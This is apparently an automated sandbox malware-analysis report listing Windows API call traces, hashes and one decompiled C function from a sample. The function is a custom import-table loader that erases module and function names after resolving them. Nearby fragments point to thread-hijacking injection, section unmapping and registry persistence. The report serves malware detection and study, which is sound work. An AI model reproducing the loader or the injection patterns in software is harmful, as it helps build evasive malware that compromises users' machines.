  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			signed int E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;
				intOrPtr _t11;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				// Walk the import descriptors: load each module, resolve every imported name, write the address into the import table, then zero the name string.
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
